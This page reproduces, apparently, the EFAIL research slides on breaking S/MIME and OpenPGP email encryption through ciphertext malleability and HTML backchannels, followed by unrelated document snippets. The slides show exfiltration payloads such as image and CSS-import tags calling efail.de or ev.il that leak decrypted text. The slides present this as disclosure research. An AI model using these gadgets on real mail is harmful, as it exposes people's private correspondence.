DOCSLIB.ORG

EFAIL: Breaking S/MIME and Openpgp Email Encryption Using Exfiltration Channels

Total Page:16

File Type:pdf, Size:1020Kb

Download full-text PDF Read full-text
EFAIL: Breaking S/MIME and Openpgp Email Encryption Using Exfiltration Channels EFAIL: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels 1 Münster University of Applied Sciences Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, 2 Ruhr University Bochum Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 3 KU Leuven EFAIL • Very important attack • Because it has a logo • Novel attack techniques targeting MIME, S/MIME and OpenPGP CVE-2018-4111 CVE-2018-5185 CVE-2018-4221 CVE-2018-8160 CVE-2018-4227 CVE-2018-8305 CVE-2018-5162 CVE-2018-12372 CVE-2018-5184 CVE-2018-12373 2 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration History of secure email 4 Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 5 Motivation for using end-to-end encryption Nation state attackers • Massive collection of Emails • Snowden’s global surveillance disclosure Breach of email provider • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! Compromise of email account • Phishing • Bad passwords 6 History of secure email 7 Both standards use old crypto Vulnerable to padding oracle attacks Ciphertext C = Enc(M) C1 valid/invalid C2 valid/invalid … M = Dec(C) (repeated several times) 8 Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Assumption: No backchannel is given 9 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Backchannel techniques Forcing a mail client to phone home • HTML/CSS <img src="http://efail.de"> • JavaScript <object data="ftp://efail.de"> • Email header <style>@import '//efail.de'</style> • Attachment preview ... • Certificate verification 11 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript XSS cheat sheets • Email header • Attachment preview • Certificate verification 12 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript Disposition-Notification-To: [email protected] • Email header Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de • Attachment preview … • Certificate verification 13 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview PDF, SVG, VCards, etc. • Certificate verification 14 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview OCSP, CRL, intermediate certs • Certificate verification 15 Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail Thunderbird KMail Claws Linux Evolution Trojitá Mutt Apple Mail macOS Airmail MailMate Backchannels Mail App CanaryMail Outlook iOS found K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail Outlook.com iCloud HushMail FastMail Mailfence ZoHo Mail Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile ask user leak by default leak via bypass script execution 16 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Attacker model 18 Attacker model 19 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Hybrid encryption • Choose message 푚 Content-type: app/encrypted • Generate session key 푠 풌푠 • Encrypt message 푚 with session key 푠 • 푐 = 퐴퐸푆푠(푚) Dear Alice, • Encrypt session key 푠 with public key 푝푢푏 of recipient thank you for your email. The meeting tomorrow • 푘 = 푅푆퐴푝푢푏(푠) c • Send the encrypted session key and will be at 9 o‘clock. the encrypted message to the recipient 21 Hybrid encryption • Obtain the encrypted email Content-type: app/encrypted • Extract ciphertext 푘 and ciphertext 푐 풌푠 • Decrypt 푘 with private key 푠푒푐 to obtain session key 푠 Dear Alice, • 푠 = 푅푆퐴푠푒푐(푘) • Decrypt ciphertext 푐 with session key 푠 thank you for your email. to obtain the cleartext 푚 The meetingctomorrow • 푚 = 퐴퐸푆푠 푐 will be at 9 o‘clock. 22 Malleability of CBC/CFB 푠 풄 ↯ 23 Malleability of CBC/CFB 푠 Dear Alice, ????????????????↯ur efail. The meeting풄tomorrow will be at 9 o‘clock. 24 Hybrid malleability of CBC/CFG Message Authentication Codes (MAC) • Protection against ciphertext tampering • Attacks against MAC-then-Encrypt (Vaudenay) • Attacks against MAC-and-Encrypt (Paterson) 25 S/MIME: Absence of authenticated encryption S/MIME Structure 26 Malleability of CBC/CFB C0 C1 C2 decryption decryption Content-type: te xt/html\nDear Bob P0 P1 27 Malleability of CBC/CFB C0' C1 C2 decryption decryption XOR A B Q 0 0 0 Zontent-type: te xt/html\nDear Bob 0 1 1 P0' P1 1 0 1 1 1 0 28 Malleability of CBC/CFB C0 ⊕ P0 C1 C2 decryption decryption 0000000000000000 xt/html\nDear Bob P0' P1 CBC Gadget 09.08.2018 29 Malleability of CBC/CFB C0 ⊕ P0 ⊕ Pc C1 C2 decryption decryption XOR A B Q 0 0 0 <img src=”ev.il/ xt/html\nDear Bob 0 1 1 P0' P1 1 0 1 1 1 0 30 Malleability of CBC/CFB C0 C1' C2 decryption decryption Content-type: te Zt/html\nDear Bob P0' P1' 31 Malleability of CBC/CFB C0 C1' C2 decryption decryption ???????????????? Zt/html\nDear Bob P0' P1' 32 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Practical Attack against S/MIME 34 Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <base " ???????????????? " href="http:"> ???????????????? <img " ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi ???????????????? "> Changing Duplicating Reordering 35 Practical Attack against S/MIME Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration OpenPGP • OpenPGP uses a variation of CFB-Mode • PGP-Standard has integrity protection • Compression is enabled by default Ci Ci+1 Ci X encryption encryption encryption encryption ? ? ? ? ? ? ? ? random plaintext Pi (known) Pi-1 Pc (chosen) 38 OpenPGP – Integrity Protection • Integrity Protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH <encrypted> TAG 8 LENGTH Tag Type of PGP packet <compressed> TAG 11 LENGTH 8 CD: Compressed Data Packet Content-Type:multipart/mixed; boundary=“ 9 SE: Symmetrically Encrypted Packet … … 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity TAG 19 LENGTH Protected Packet efa3e9ca54f0879c5b187636c23b7de376a5ba41 19 MDC: Modification Detection Code Packet 39 RFC4880 on Modification Detection Codes OpenPGP – Integrity Protection Defeating Integrity Protection Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 41 OpenPGP – Compression • PGP uses compression (DEFLATE) Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY • Makes our life much harder: we do not know so many plaintext bytes <GUESS_1> --BOUNDARY • We need to know at least 11 Bytes of the plaintext but only know 4 from the packet ... headers --BOUNDARY <GUESS_N> • But: We can do multiple guesses per Mail --BOUNDARY-- • Mostly between 500 to 1,000 „submails“ per mail 42 OpenPGP – Compression 43 OpenPGP – Compression Content-Type: multipart/alternative; boundary="b1_232f841e30b3b8112f31ed86c8cee5ab" --b1_232f841e30b3b8112f31ed86c8cee5ab Content-Type: text/html; charset="UTF-8" <html> <body> <p>Hello XXX,</p> <p>here is your code: 123456</p> <img src="https://www.facebook.com/email_open_log_pic.php?mid=TRACKING_CODE_HERE"/> </body> </html> --b1_232f841e30b3b8112f31ed86c8cee5ab-- 44 OpenPGP – Compression Facebook Password Recovery Content-Type: • Generated 100,000 Password Recovery Emails based on template multipart/mixed; boundary=„BOUNDARY" • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes --BOUNDARY A302789ced590b90... No. Starts with … % Cumulated % --BOUNDARY 1 a302789ced590b9014c519 30.95 30.95 A302789ced590d90... 2 a302789ced590d9014c515 7.99 38.94 --BOUNDARY 3 a302789ced59099014d519 7.80 46.73 A302789ced590990... … 211 a302789ced59098c14551a 0.001 100 --BOUNDARY-- 45 OpenPGP – Compression Enron Email Dataset • Contains approx. 500,000 „real“ Emails1 • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789c8d8f4b4ec3400c 6.61 6.61 2 a302789ced90c16e133110 2.21 8.82 3 a302789c7590b14ec33010 0.66 9.48 … 500 a302789c4d90cb8ed34010 0.03 40.99 1 https://www.cs.cmu.edu/~enron/ 46 47 Impact on the standards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 48 Overview 1. Introduction
Load more

Recommended publications
  • Free Email Software Download Best Free Email Client 2021
    free email software download Best Free Email Client 2021. This article is all about best free email clients and how they can help you be more productive. We also talk about Clean Email, an easy-to-use email cleaner compatible with virtually all major email services. But before we go over the best email clients for 2021, we believe that we should first explain what advantages email clients have over web-based interfaces of various email services. Clean Email. Take control of your mailbox. What Is an Email Client and Why Should I Use One? If you’re like most people, you probably check your email at least once every day. And if you’re someone whose work involves communication with customers, clients, and coworkers, the chances are that you deal with emails all the time. Even though we spend so much time writing, forwarding, and managing emails, we hardly ever pause for a moment and think about how we could improve our emailing experience. We use clunky web interfaces that are not meant for professional use, we accept outdated applications as if alternatives didn’t exist, and we settle for the default email apps on our mobile devices even though app stores are full of excellent third-party email apps. Broadly speaking, an email client is a computer program used to access and manage a user’s email. But when we use the term email client in this article, we only mean those email clients that can be installed on a desktop computer or a mobile device—not web-based email clients that are hosted remotely and are accessible only from a web browser.
    [Show full text]
  • Mesačný Prehľad Kritických Zraniteľností Máj 2018
    Mesačný prehľad kritických zraniteľností Mesačný prehľad kritických zraniteľností Máj 2018 1. Operačné systémy Microsoft Windows V máji spoločnosť Microsoft opravila 4 kritické zraniteľnosti operačného systému Microsoft Windows. Zraniteľnosti CVE-2018-0959 a CVE-2018-0961 môžu spôsobiť vykonanie škodlivého kódu na diaľku. Prvá z nich je spôsobená nesprávnym overovaním vstupu Windows Hyper-V na serveri od autentifikovaného používateľa na hostiteľskom operačnom systéme. Druhá sa týka overovania paketových dát v SMB protokole systému Windows Hyper-V. Na zneužitie týchto zraniteľností musí útočník spustiť špeciálne vytvorenú aplikáciu, ktorá umožní zneužitie týchto zraniteľností. Úspešný útočník následne môže vykonať ľubovoľný kód pomocou Windows Hyper-V. Našli sa aj zraniteľnosti CVE-2018-8120 a CVE-2018-8174 taktiež umožňujúce vzdialené vykonávanie kódu či zvýšenie privilégií, ktoré sú bližšie popísané aj v našom varovaní. Zraniteľné systémy: Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1511 for 32-bit Systems Windows 10 Version 1511 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems. Windows 10 Version 1703 for 32-bit Systems Windows 10 Version 1703 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows
    [Show full text]
  • Business SITUS Address Taxes Owed # 11828201655 PROPERTY HOLDING SERV TRUST 828 WABASH AV CHARLOTTE NC 28208 24.37 1 ROCK INVESTMENTS LLC
    Business SITUS Address Taxes Owed # 11828201655 PROPERTY HOLDING SERV TRUST 828 WABASH AV CHARLOTTE NC 28208 24.37 1 ROCK INVESTMENTS LLC . 1101 BANNISTER PL CHARLOTTE NC 28213 510.98 1 STOP MAIL SHOP 8206 PROVIDENCE RD CHARLOTTE NC 28277 86.92 1021 ALLEN LLC . 1021 ALLEN ST CHARLOTTE NC 28205 419.39 1060 CREATIVE INC 801 CLANTON RD CHARLOTTE NC 28217 347.12 112 AUTO ELECTRIC 210 DELBURG ST DAVIDSON NC 28036 45.32 1209 FONTANA AVE LLC . FONTANA AV CHARLOTTE 22.01 1213 W MOREHEAD STREET GP LLC . 1207 W MOREHEAD ST CHARLOTTE NC 28208 2896.87 1213 W MOREHEAD STREET GP LLC . 1201 W MOREHEAD ST CHARLOTTE NC 28208 6942.12 1233 MOREHEAD LLC . 630 402 CALVERT ST CHARLOTTE NC 28208 1753.48 1431 E INDEPENDENCE BLVD LLC . 1431 E INDEPENDENCE BV CHARLOTTE NC 28205 1352.65 160 DEVELOPMENT GROUP LLC . HUNTING BIRDS LN MECKLENBURG 444.12 160 DEVELOPMENT GROUP LLC . STEELE CREEK RD MECKLENBURG 2229.49 1787 JAMESTON DR LLC . 1787 JAMESTON DR CHARLOTTE NC 28209 3494.88 1801 COMMONWEALTH LLC . 1801 COMMONWEALTH AV CHARLOTTE NC 28205 9819.32 1961 RUNNYMEDE LLC . 5419 BEAM LAKE DR UNINCORPORATED 958.87 1ST METROPOLITAN MORTGAGE SUITE 333 3420 TORINGDON WY CHARLOTTE NC 28277 15.31 2 THE MAX SALON 10223 E UNIVERSITY CITY BV CHARLOTTE NC 28262 269.96 201 SOUTH TRYON OWNER LLC 201 S TRYON ST CHARLOTTE NC 28202 396.11 201 SOUTH TRYON OWNER LLC 237 S TRYON ST CHARLOTTE NC 28202 49.80 2010 TRYON REAL ESTATE LLC . 2010 S TRYON ST CHARLOTTE NC 28203 3491.48 208 WONDERWOOD TREE PRESERVATION HO .
    [Show full text]
  • Znetlive SSL Compatible Applications, Platforms & Operating
    ZNetLive SSL Compatible Applications, Platforms & Operating Systems Certificate Authority Root Apple MAC OS 9.0+ (circa 2002), includes 10.5.X and 10.6.X Future proof at 2048 bit, embedded in all Microsoft Windows XP, Vista, 7 and 8 (all devices and browsers and capable of upgrading versions inc 32/64 bit) weak encryption to a strong one is the most reliable Certificate Authority Root-GlobalSign. It is very important to ensure a flawless interaction of your online solutions with Default API Support within Hosting Control customers making connection with your web Panels server, reading emails, trusting your e- Ubersmith documents or running your code. Every WHMCS standard machine that uses trust of Public Key Infrastructure (PKI), e.g. S/MIME, SSL/TLS, Document Signing and Code Signing, has GlobalSign’s Root Certification present in it. Email Clients (S/MIME) ZNetLive’s SSL Certificates authenticated by GlobalSign have 2048 bit strength throughout Mulberry Mail complete Digital Certificate portfolio and Microsoft Outlook 99+ comply with recommendations of National Microsoft Entourage (OS/X) Institute of Standards and Technology (NIST) Qualcomm Eudora 6.2+ according to which all cryptographic keys Mozilla Thunderbird 1.0+ should be 2048 bit strength from 2011 onwards. Mail.app Anything weaker than 2048 bit encryption is Lotus Notes (6+) considered insecure. Because of this, the Netscape Communicator 4.51+ Certification Authorities and Browsers insists The Bat that all the EV SSL Certificates should be 2048 Apple Mail bit encryption.
    [Show full text]
  • MTA STS Improving Email Security.Pdf
    Improving Email Security with the MTA-STS Standard By Brian Godiksen An Email Best Practices Whitepaper CONTENTS Executive Overview 03 Why Does Email Need Encryption in Transit? 04 The Problem with “Opportunistic Encryption” 07 The Anatomy of a Man-in-the-Middle Attack 08 The Next Major Step with Email Encryption: MTA-STS 10 What Steps Should Senders Take to Adopt MTA-STS? 11 About SocketLabs 12 Brian Godiksen Brian has been helping organizations optimize email deliverability since joining SocketLabs in 2011. He currently manages a team of deliverability analysts that consult with customers on best infrastructure practices, including email authentication implementation, bounce processing, IP address warm-up, and email marketing list management. Brian leads the fight against spam and email abuse at SocketLabs by managing compliance across the platform. He is an active participant in key industry groups such as M3AAWG and the Email Experience Council. You can read more of Brian’s content here on the SocketLabs website. ©2019 SocketLabs 2 Executive The Edward Snowden leaks of 2013 opened many peoples’ eyes to the fact that mass surveillance was possible by Overview intercepting and spying on email transmissions. Today, compromised systems, database thefts, and technology breaches remain common fixtures in news feeds around the world. As a natural response, the technology industry is rabidly focused on improving the security and encryption of communications across all platforms. Since those early days of enlightenment, industry experts have discussed and attempted a variety of new strategies to combat “pervasive monitoring” of email channels. While pervasive monitoring assaults can take many forms, the most prominent forms of interference were man-in-the-middle (MitM) attacks.
    [Show full text]
  • Zix Wins 5-Vendor Email Encryption Shootout Email Encryption Has Come a Long Way Since Our Last Review
    Reprint THE CONNECTED ENTERPRISE MARCH 13, 2017 Zix wins 5-vendor email encryption shootout Email encryption has come a long way since our last review BY DAVID STROM, NETWORK WORLD terms of the flexibility of various encryption While these personal encryption products protocols used, along with DLP features that are improvements, there are also steps mail encryption products have are built-in along with a simple and single forward for the enterprise encryption email made major strides since we last pricing structure -- all things that Zix excels. user. Some products, such as Zix, hide the looked at them nearly two years All of these encryption products will cost encryption key process entirely from the ago. They have gotten easier you a few dollars a month per user. While user, so well that you might not even know to use and deploy, thanks to a that doesn’t sound like much, if you have that an encrypted message has passed from Ecombination of user interface and encryption an installation of several thousand users, sender to recipient. key management improvements, and are at the price tag could add up. However, the Others, such as Virtru and HPE/Voltage, the point where encryption can almost be alternative is having your email stream use identity-based encryption management called effortless on the part of the end user. available to anyone with a simple collection to verify a new recipient in their systems. Our biggest criticism in 2015 was that the of tools that even teens can master. Once a user new to these products products couldn’t cover multiple use cases, clicks on a confirmation email, they are such as when a user switches from reading Trends and bright spots forever allowed access, their emails are emails on their smartphone to moving to a In 2015, we said that gateways may have automatically decrypted, and there is no webmailer to composing messages on their fallen out of favor, but that trend has been need for any further effort to keep track of or Outlook desktop client.
    [Show full text]
  • The Sweet Setup -- Airmail Tips and Tricks Copy
    Airmail Tips & Tricks Written and published by the fine folks at The Sweet Setup. thesweetsetup.com 1 of 16 About The Sweet Setup We enjoy spending an inordinate amount of time and energy to research, test, and find the very best apps. The Sweet Setup exists to highlight the software that has proven to be the best, not necessarily the newest. Who wants just any weather app? Not us. We want the best! And so do you. That’s why our goal is to help you (and ourselves) find the best apps for your iPhone, iPad, and Mac. Our Other Websites The Focus Course: Get clarity about your goals and priorities, build traction on your side projects, stop procrastinating, bring your life into focus. Tools & Toys: Gear guides and reviews every day. Time Management Training: Scheduling, prioritizing, and time management training to help you get (and stay) in control of your time an attention. 2 of 16 Airmail Tips & Tricks 1. About Airmail for Mac 2. Using Send & Archive 3. How to Snooze Messages 4. How to use Quick Reply 5. Marking Messages as Spam 6. Using and Customizing the Swipe Gestures for Airmail on iOS All written content and photography is original and copyright 2017 Blanc Media, LLC Airmail, the Airmail logo, and its design are registered trademark of Bloop. airmailapp.com, bloop.info The Sweet Setup and Blanc Media are not affiliated with Airmail or Bloop. 3 of 16 4 of 16 About Airmail Airmail is marketed as being a “lightning-fast email client for Mac,” and it certainly doesn’t disappoint.
    [Show full text]
  • Downloadable Email Program for My Pc 32 Best Free Email Clients
    downloadable email program for my pc 32 Best Free Email Clients. Here are 32 best free email client software . These let you manage and access all of your email accounts in one single place easily. All these email client software are completely free and can be downloaded to Windows PC. These free software offer various features, like: can be used with IMAP, SMTP, POP3 and Gmail, keeps your emails safe and secure, lets you open various emails simultaneously, provide protection from spam, lets you view your emails offline, manage and access all of your email accounts in one single place, supports PH, LDAP, IMAP4, POP3 and SMPT mail protocols etc. So, go through this list of free email client software and see which ones you like the most. Thunderbird. Thunderbird is a free and handy email client software for your computer. It can be used with IMAP, SMTP, POP3 and Gmail. It will also work with email accounts provided by MS Exchange Server. The user interface of Thunderbird is tabbed. It lets you open various emails simultaneously. Thunderbird keeps your emails safe and secure. It also has special filters for filtering the mail. Windows Live Mail. Windows Live Mail is a free email client for your computer. It works with various email accounts. It lets you access Yahoo, Gmail, Hotmail and emails from different servers which supports POP3 and SMTP. Its security features are excellent it will also provide protection from spam. You can also view your emails offline in this freeware. Zimbra Desktop. Zimbra Desktop is a free email client.
    [Show full text]
  • LEGAL TECHNOLOGY Insider
    CHARLES CHRISTIAN’s LEGAL TECHNOLOGY iNSIDER THE ESSENTIAL GUIDE TO WHAT’S HOT (AND WHAT’S NOT) IN LAW OFFICE SYSTEMS ➦ workgroup friendly office automation WORDPERFECT suite that should find a ready place in SET FOR JUNE law firm and IT suppliers’ fee earner desk- top development strategies. COMEBACK For advanced users, the suite has The legal world’s favourite word- Internet and multimedia enhancements. processing software WordPerfect is While more traditional wordprocessor scheduled to make its comeback in users should find the new “as you go” June with the launch of the new 32- features in WordPerfect 7 improve pro- IN THIS bit Windows 95 compliant Version 7.0. ductivity by allowing greater flexibility EDITIONÉ At the same time WordPerfect’s new over checking spelling, reformatting docu- owners Corel will also be launching ments and changing numbering. Microsoft to PerfectOffice 7.0, the latest upgrade In addition, the suite contains a Exchange Mail… 2 to the company’s all-in-one office copy of IBM’s VoiceType Control software automation suite. so users can actually control applications Shakespeare LEGAL TECHNOLOGY iNSIDER has by spoken commands, such as “open file”, looking for recently been looking at the pre-release “print document” etc. co-authors… 3 Beta 2 version of the software and while there remains the possibility of further ☞ Comment… A lot can happen in the LOTIES awards changes being made to the final version, two months between now and the provi- latest… 4 it is clear Corel is pulling out all the stops sional 6th June launch date but on first to ensure WordPerfect’s second coming impressions it seems Corel has devised a Roll your own returns the product to its former glory as wordprocessing/office suite that is more accounts with a market leader.
    [Show full text]
  • In the United States District Court for the District of Kansas
    Case 2:14-cv-02046-JAR-KGG Document 19 Filed 11/09/15 Page 1 of 26 IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF KANSAS DORAN LAW OFFICE, ) ) Plaintiff, ) v. ) Case No. 14-2046-JAR-GLR ) STONEHOUSE RENTALS, INC., ) ) Defendant. ) ___________________________________ ) MEMORANDUM AND ORDER Plaintiff Doran Law Office filed this action seeking to recover legal fees and expenses owed by Defendant Stonehouse Rentals, Inc. Defendant did not answer the Complaint within the time allowed by law and stated on the Summons, and default was entered by the Clerk of the District Court. Upon application of Plaintiff, the Court then entered default judgment in the amount of $133,024.30. Defendant filed a Motion to Set Aside Entry of Default and Default Judgment (Doc. 12). An evidentiary hearing was held September 10, 2015. After considering the arguments, evidence, and testimony presented by the parties, the Court is prepared to rule. For the following reasons, the Court denies Defendant’s motion. I. Factual and Procedural Background Plaintiff Doran Law Office filed its complaint against Stonehouse Rentals, Inc. (“Stonehouse”) on January 31, 2014.1 In the Complaint, Plaintiff states that Defendant is a Kansas corporation registered with the Kansas Secretary of State, with its registered agent listed as Salah Ibrahim and its registered office on record as 22858 Fall Leaf Road, Linwood, Kansas. Plaintiff hired a special process server, Aristocrat Investigations, who attempted to 1Doc. 1. Case 2:14-cv-02046-JAR-KGG Document 19 Filed 11/09/15 Page 2 of 26 personally serve Defendant’s president and resident agent, Salah Ibrahim.
    [Show full text]
  • Jane Hutt: Businesses That Have Received Welsh Government Grants During 2011/12
    Jane Hutt: Businesses that have received Welsh Government grants during 2011/12 1 STOP FINANCIAL SERVICES 100 PERCENT EFFECTIVE TRAINING 1MTB1 1ST CHOICE TRANSPORT LTD 2 WOODS 30 MINUTE WORKOUT LTD 3D HAIR AND BEAUTY LTD 4A GREENHOUSE COM LTD 4MAT TRAINING 4WARD DEVELOPMENT LTD 5 STAR AUTOS 5C SERVICES LTD 75 POINT 3 LTD A AND R ELECTRICAL WALES LTD A JEFFERY BUILDING CONTRACTOR A & B AIR SYSTEMS LTD A & N MEDIA FINANCE SERVICES LTD A A ELECTRICAL A A INTERNATIONAL LTD A AND E G JONES A AND E THERAPY A AND G SERVICES A AND P VEHICLE SERVICES A AND S MOTOR REPAIRS A AND T JONES A B CARDINAL PACKAGING LTD A BRADLEY & SONS A CUSHLEY HEATING SERVICES A CUT ABOVE A FOULKES & PARTNERS A GIDDINGS A H PLANT HIRE LTD A HARRIES BUILDING SERVICES LTD A HIER PLUMBING AND HEATING A I SUMNER A J ACCESS PLATFORMS LTD A J RENTALS LIMITED A J WALTERS AVIATION LTD A M EVANS A M GWYNNE A MCLAY AND COMPANY LIMITED A P HUGHES LANDSCAPING A P PATEL A PARRY CONSTRUCTION CO LTD A PLUS TRAINING & BUSINES SERVICES A R ELECTRICAL TRAINING CENTRE A R GIBSON PAINTING AND DEC SERVS A R T RHYMNEY LTD A S DISTRIBUTION SERVICES LTD A THOMAS A W JONES BUILDING CONTRACTORS A W RENEWABLES LTD A WILLIAMS A1 CARE SERVICES A1 CEILINGS A1 SAFE & SECURE A19 SKILLS A40 GARAGE A4E LTD AA & MG WOZENCRAFT AAA TRAINING CO LTD AABSOLUTELY LUSH HAIR STUDIO AB INTERNET LTD ABB LTD ABER GLAZIERS LTD ABERAVON ICC ABERDARE FORD ABERGAVENNY FINE FOODS LTD ABINGDON FLOORING LTD ABLE LIFTING GEAR SWANSEA LTD ABLE OFFICE FURNITURE LTD ABLEWORLD UK LTD ABM CATERING FOR LEISURE LTD ABOUT TRAINING
    [Show full text]
  • PGP) and GNU Privacy Guard (GPG): Just Enough Training to Make You Dangerous
    Pre$y Good Privacy (PGP) And GNU Privacy Guard (GPG): Just Enough Training to Make You Dangerous Joe St Sauver, Ph.D. M3AAWG Senior Technical Advisor Scien<st Farsight Security, Inc. M3AAWG 36, San Francisco, California Monday, Feb 15th, 2016, 12:30-14:30 hLps://www.stsauver.com/joe/pgp-tutorial-sfo/ 0. IntroducDon Obligatory Screen: Eligibility For Strong EncrypDon • This is not legal advice (for that, please contact your aorney), however please note that some people are NOT ALLOWED to use strong encryp<on under prevailing laws. • By connuing with this training, you cerDfy that you are NOT: -- a ci<zen, naonal, or resident of a country barred from access to strong encryp<on by the U.S. or other countries, including but not limited to persons from the Crimea region of the Ukraine, Cuba, Iran, North Korea, Sudan, or Syria; -- nor are you a "Specially Designated Naonal" (see hp://www.treasury.gov/resource-center/sanc<ons/SDN-List/ Pages/default.aspx ), nor a person (or representave of a company) that is subject to any other US or other sanc<ons program or restric<on. • If you are subject to any such prohibi<on or restric<on, you must NOT par<cipate in today's encryp<on training. 3 Disclaimer • While all due care was used in preparing the content of this training, we cannot ensure that you will not inadvertently make a mistake, or encounter a vulnerability while using PGP/GPG. • Given that you cannot "unring the bell once it has been rung," and given that some poten<al "losses of confiden<ality" may have grave or even catastrophic consequences, please remember that: -- you should not use PGP/GPG for "life/safety-cri<cal" purposes -- today's training is provided on a "best efforts," as-is, where-is basis, with all evident and/or latent faults/flaws -- should you decide to use and rely on PGP/GPG, the decision to do so is your own and at your own risk; we disclaim all responsibility for any impacts associated with the use, misuse, or abuse of PGP/GPG by anyone here today or using this talk.
    [Show full text]